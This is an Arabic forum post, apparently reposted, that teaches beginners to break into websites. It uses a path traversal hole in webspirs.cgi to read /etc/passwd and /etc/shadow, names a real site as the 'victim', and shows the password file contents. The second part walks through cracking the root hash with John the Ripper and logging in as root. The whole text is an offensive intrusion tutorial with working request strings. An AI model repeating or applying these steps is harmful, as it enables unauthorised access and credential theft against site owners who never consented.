الدرس :
لازم تعرفون ان الاختراق مايتم الا بوجود ثغره في الموقع !!!
والثغرااات كثير ولكن اكثر الثغراااااا ت تستخدم من نظام لينوكس Linux وتكون مكتوبة بأحد اللغات بيرل او ++C وعند حصول احدنا على ثغره ,,,,,
يحتاج الى مفسر الى اللغة المكتوبه بها الثغره هذه !!!!
وهذه والحمد لله متوفر في Linux .
الان انا ما عندي Linux هذا يعني ما اقدر اخترق موقع ؟؟؟؟؟؟؟
لالالالالالالالالالالالالالالا تقدر ونص !!!!
ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــــــــــــــــــــــــــــــــــ
نبدأ الان بأول ثغره نقدر نستخدمها من ويندووز !!!
اسهل الثغرااات هي ثغرات CGI وهي كثيره جدا ,,,
اليوم اريد ان اشرح احد هذه الثغرات :
الملف المشكله " او الثغره " يدعى webspirs.cgi هذا الملف هو المساعد على اختراق الموقع !!!
ومنه نستطيع لقط " لطش " ملف الباسووورد !!
الثغره عباره عن اضافة نضيقها الى اسم الموقع ويتم الاختراق بها !!!
ماهي هذه الاضافه ؟؟؟؟؟؟
هي /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
طيب هي راح تكون على الشكل التالي :
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwdاسم الموقع اللي بتخترقه
الان انا دورت على موقع نطبق عليه الكلام هذا !!!!!!!!
الموقع الضحيه هو :
http://wilsonweb2.hwwilson.com/ كل ماعلينا هو لصق الثغره في الموقع والحصوووول على ملف الباسووورد !!!! لتصبح على الشطل التالي :
http://wilsonweb2.hwwilson.com/etc/passwd اممممممممممممممممممممممم الموقع اخترق عن طريق الثغره هذه ممتااااااااز !!!!!
لكن الباسووورد للاسف مشفر !!!! والحل ؟؟؟؟؟
سهل ان شاء الله !!!!
نحتاج الى كود اخر لنكشف التشفير ونغير الكلمات المشفره الى كلمات واضحة ونستنتج الباسووورد للموقع !!!
الان الكلمة المشفره تكون في ملف اسمه shadow كيف نجيبة !!!
بالكود التالي :
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadow
وبتطبيقه على موقعنا نحصل على :
http://wilsonweb2.hwwilson.com/etc/shadow الان وجدنا الباسووورد المشفر نحتاج الى شوية تعديلات بسيطة لتكوين ملف وكسر التشفير واستخراج الباسوور للموقع .
ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــــــــــــــــــــــــ
كيف هذه التعديلات ؟؟؟؟
ملف الشادو به باسوورد الروت " مدير الموقع " root !!!
الان نعمل التالي :
الحين ملف passwd في بعد كل اسم X مثل root:X
من ملف شادو تقارن كل اكس بما يقابله من تشفير وتحطه مكانه ,,,
بالمقارنه بصورة سريعه root
= JTTIe4QG268fg:10643 ,,,JTTIe4QG268fg:10643 تبدلها بالاكس
ممكن يكون الملف مختلفه رموزه عندي وعندك !!!
لكن احنا نكرر العمليه على كل اكس في الملف الاول ونغيرها بما يقابلها بالملف الثاني !!
يا شباب الفقره هذه والله صعب شرحها لكن اهم شي التركيز في المكتوب !!!
طيب لما ننسخ ونلصق فين نكتب الناتج ؟؟؟
نكتب الناتج في مستند جديد وليكن الدفتر او صفحة وورد !!!
هذه بدايه بسيطة لمستند الدفتر اللي انا مسويه للبرنامج !!!
root:XOT4AiUKMRcKQ:10643
:0:1:Super-User:/:/sbin/sh daemon:NP:6445
:1:1::/: bin:NP:6445
:2:2::/usr/bin: sys:NP:6445
:3:3::/: adm:NP:6445
:4:4:Admin:/var/adm: lp:NP:6445
اكيد واضحة التغييرات فيه !!!
طيب خلاص زبطنا كل شي الان والمستند جاهز خلصنا !!!!!
لالالالالالالالالالالالالالالالالالالالالالالالالا
لالالالالالالالالالالالالالالالا
باقي نكسر التشفير الان باستخدام برنامج وين البرنامج ؟؟؟؟ وين ؟؟؟
دقيقة اخرفش في اوراقي واجيب لكم الرنامج :
اهاااا هذه وصلة تحميل الرنامج :
http://www.openwall.com/john/john-16d.zip نزلوا البرنامج واحفظوا مستند الورد حقكم وانتظروني في الدرس القادكم
: كسر التشفيررررررررر "
وربي تعبت من الكتابه اهم شي لا احد يتفلسف ويفتح برنامج كسر الحماية عشان الواحد يبدأ خطوة خطوة !!!
نزل البرنامج وخليه على ضغطه !!!
لا تستعجل جايك بالدرس انا حبيت اعلمك خطوة خطوة ماابي اكثر عليك الدروس بعدين يتشتت ذهنك افهم الدرس وتابع معي الدرس القادم كيف تكسر التشفير !!
=-=-=-=-
نقلته حرف حرف ولا حرف طالع منه ولا منه
(KRKR)
__________________
http://www.m3gic.com/vb/attachment.php?s=&postid=47356__________________________________________________ _______________
تكملة الدرس
=======
هذا الدرس سيكون تكملة للدرس السابق وهو اختراق المواقع !!!
اليوم سوف نتطرق إلى " أهم خطوة " في الاختراق إلا وهي كسر التشفير !!!
توصلنا في الدرس السابق إلى الكلمة السرية ولكن للأسف كانت مشفره " وهي دائما ما تكون مشفره " !!!
لذا لابد من كسر الشيفره والحصول على الكلمة السرية
خطوات كسر التشفير :
1- أولا قم بفتح الملف المضغوط الموجود على الموقع التالي :
http://www.openwall.com/john/john-16d.zip عند فكك للضغط سوف تجد الملف المضغوط في unzipped إذا ما تعرف اتبع المسار التالي :
جهاز الكمبيوتر >>> C >>> unzipped
الآن سوف تجد المجلد التالي في unzipped وهو : john-16d
افتح المجلد سوف تجد داخله مجلد بالاسم التالي : JOHN-16
عند فتحك للمجلد سوف تجد مجلدين وهما DOC و RUN
أهم شي عندنا هو مجلد RUN
2- ألان أكيد الكل قام بعمل التغييرات في كلمة السر المشفرة ودمج الملفان مع بعضهما البعض ولم يتبقى إلا حفظ الملف باسم passwd وبدون امتداد !!!!
طيب واللي ما يعرف يحفظ بدون امتداد !!!!! وش يسوي ؟؟؟؟
يتبع الخطوات التالية :
أولا يفتح الملف أكيد أنت كتبته في الورد طيب J اعمل أولا روح إلى حفظ باسم واحفظه باسم passwd
ثم اعمل قص للملف وانسخه في مجلد الويندوز اللي موجود في C
الآن رووح وشغل الدوووووس واكتب التالي :
ren passwd.doc passwd
تأكد انك داخل مجلد ويندوز !!!! من الدوس طبعا اذا لم تكن في داخل ويندوز اكتب التالي windows
cd
ثم اكتب السطر السابق .
بعد ذلك اذهب لمجلد الويندوز وابحث عن passwd ثم اعمل لها قص وارجع إلى ملفنا القدييييييييييييييييم RUN والصقها فيه !!!!
3- الآن لم يتبقى لدينا إلا القليل " هانت يا لربع " !!!!!
افتح الدوس من جديد واكتب التالي :
إذا كنت داخل مجلد ويندوز اكتب مايلي : cd john-16\run
أما إذا كنت على السي اكتب السطرين التاليين :
cd windows ثم انتر
وبعد ذلك اكتب : cd john-16\run ثم انتر
بعد ذلك اكتب السطر التالي :
john -i passwd ثم انتر
الآن سوف يقوم الدوس بكسر الشيفره !!!!
كل ما عليك هو أن تضغط انتر كل خمس دقائق !! وتلاحظ كلمة السر !!!
وسوف تحفظ النتيجة في الملف john.pot الموجود في RNN
وعلى فكره بعض عمليات الكسر تأخذ دقا يق وبعضها ساعات
الآن لم يتبقى سوى اختراق الموقع :
تروح تخترقهم باليوزر root والباسوورد الناتجة عندك
خاتمه :
أنا كتبت هذا الموضوع بأبسط الطرق الممكنة حيث كان بمقدوري شرحه في 10 اسطر ولكن أنا اعتبرت أنني اشرح إلى ناس ليس لديهم خبره في الدوس أو كسر التشفير !!!
__________________
http://www.m3gic.com/vb/attachment.php?s=&postid=47356م ن ق و ل بس انا والله ضفت بعض الاضافات
الخميس يونيو 24, 2021 11:39 pm من طرف 
